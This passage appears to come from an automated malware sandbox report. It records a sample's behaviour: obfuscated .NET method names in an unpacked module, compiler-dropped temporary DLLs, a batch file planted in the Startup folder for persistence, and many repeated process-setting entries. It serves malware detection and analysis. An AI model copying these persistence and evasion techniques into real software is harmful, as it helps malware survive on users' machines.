              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A72C push cs; retf 2_2_00007FFD9BB6A74A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C739 push eax; retf 2_2_00007FFD9BB6C73A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6BF4F push eax; retf 2_2_00007FFD9BB6BF50
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6CAC1 push eax; retf 2_2_00007FFD9BB6CAC2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6AA68 push cs; retf 2_2_00007FFD9BB6AA69
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6D672 push ecx; retf 2_2_00007FFD9BB6D673
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C681 push eax; retf 2_2_00007FFD9BB6C682
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6BE5A push eax; retf 2_2_00007FFD9BB6BE5B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A5B9 push cs; retf 2_2_00007FFD9BB6A5BA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A983 push cs; retf 2_2_00007FFD9BB6A984
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C51F push eax; retf 2_2_00007FFD9BB6C520
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A930 push cs; retf 2_2_00007FFD9BB6A931
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C141 push eax; retf 2_2_00007FFD9BB6C142
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A8DD push cs; retf 2_2_00007FFD9BB6A8DE
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, dS8NLBORQCnVypqC83v.csHigh entropy of concatenated method names: 'BCqOXeTmv9', 'U3pOumGsu4', 'fuIOlTMxKk', 'zixOrHaVXa', 'CkiO8lhY9c', 'JySO0WQdTN', 'ltJO5WQVx9', 'GONOW3oATt', 'aOZOZW4wdH', 'GxEptKaimOF2wqBtrf1'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, HXWgqf7QK37HQ0ZpisZ.csHigh entropy of concatenated method names: 'wWc74tJV3d', 'i0M7tjFvsd', 'xmc7D5UyIb', 'DAQ76jgD5d', 'vKc7YmXJBj', 'qfo7BYhLkc', 'Jvm7yiCJ8F', 'hWa7sdSoWA', 'IqU7kwu7n7', 'Jca73Hjm9o'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, Dc4xUxvOwXRXuWZuBqx.csHigh entropy of concatenated method names: 'G1CvmmDfsR', 'iFtvXHTZZE', 'qv9vuYO6aw', 'pAmvl2BZg2', 'NfGvrmE0A6', 'BP0v8pdobr', 'BGPv0hNxQE', 'y9Iv5XC42W', 'uHgvWmqc8U', 'zU2vZv9sUB'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.csHigh entropy of concatenated method names: 'gvLhX3oBubUujS9vuYp', 'NLL83koyt6Wvt33yAhj', 'pgfZkkSeMY', 'vh0ry9Sq2v', 'tmJZg4Dl6V', 'bxiZD4WM21', 'IhOZ6o2txi', 'mOyZS55OA6', 'W6sek53ZPM', 'Uu9WcY71tn'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, U3E6RwN5SaPZeZUlErQ.csHigh entropy of concatenated method names: 'yJoNZ7E45S', 'm2sNvL1Jpg', 'CQmNKvbK7F', 'qaeN2NtOP8', 'iMXN1SIOn4', 'hyFNMf9N6a', 'Mk4N9wG0GL', 'jyTNIWn3VI', 'mxXNQrUQrd', 'kRONbW4oVv'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, o8P76yvvHV5KpUNsml7.csHigh entropy of concatenated method names: 'ogOQ0NcqVg', 'SAhQ5DjcbE', 'vjdQW9CUnK', 'kRLQZbCtQg', 'WEjQvXwYeL', 'QGfQKts7GH', 'JRuQ2fHKGZ', 'hT4vqP4jUa', 'dtRQ1ee6MW', 'CoWQMovtgf'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, BYp4U2Oe5wBDI4goG2T.csHigh entropy of concatenated method names: 'SAkbTlwEevfVN7OfceR', 'firsqowOpF5u7MyABPY', 'lC52Q4wnWMdK6pAtMIY', 'lI2Dh7wfSbAAVvtZHvc', 'IfrcE44OyD', 'eMvcO4ZytH', 'tptcceFFV9', 'QObcnPQgnZ', 'lJ8cfe8ReD', 'IekcCYmCMn'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, dSjLwOOBq5S8xcIDmvy.csHigh entropy of concatenated method names: 'CULufKTteJhl0RuNSew', 'oQVjUkTghxn2qQENTbW', 'Dispose', 'ToString', 'DXcMKrT6ieWNGruyEyf', 'jOEugUTStIEMcl8gjMd', 'QpGiTQhrZpHBs0vbm5Q', 'ssBPNmh8GL8a08qPsUB', 'SFcQmw7yx2', 'gl1QXQWNFG'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, cOa8qNtY5ahAXGWQgN.csHigh entropy of concatenated method names: 'mxADtipSP', 'eS364pa0w', 'LJ9Sp5Wfx', 'me6ahOsMX', 'pV9FcqTsZ', 'C5KqE8v3J', 'q1eiJDFX0', 'uZ0Onrt3u2', 'oQATxfFEE', 'yqoVgFGZX'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, uC0hRMPfPBtRWtAg1mn.csHigh entropy of concatenated method names: 'bXlPP3Ncc7', 'TYjP7Ktb1S', 'yu2PNpEHJA', 'oVMPjQKEyI', 'DE0PGQ9Xi0', 'RZdPLFYhvs', 'qx9PRtiFVD', 't6hPmRQrOD', 'wyNPXVSrKq', 'aPWPue8diN'
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zozwmnym.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.dllJump to dropped file

              Boot Survival

              barindex
              Drops script or batch files to the startup folder
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.batJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.batJump to behavior
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.batJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
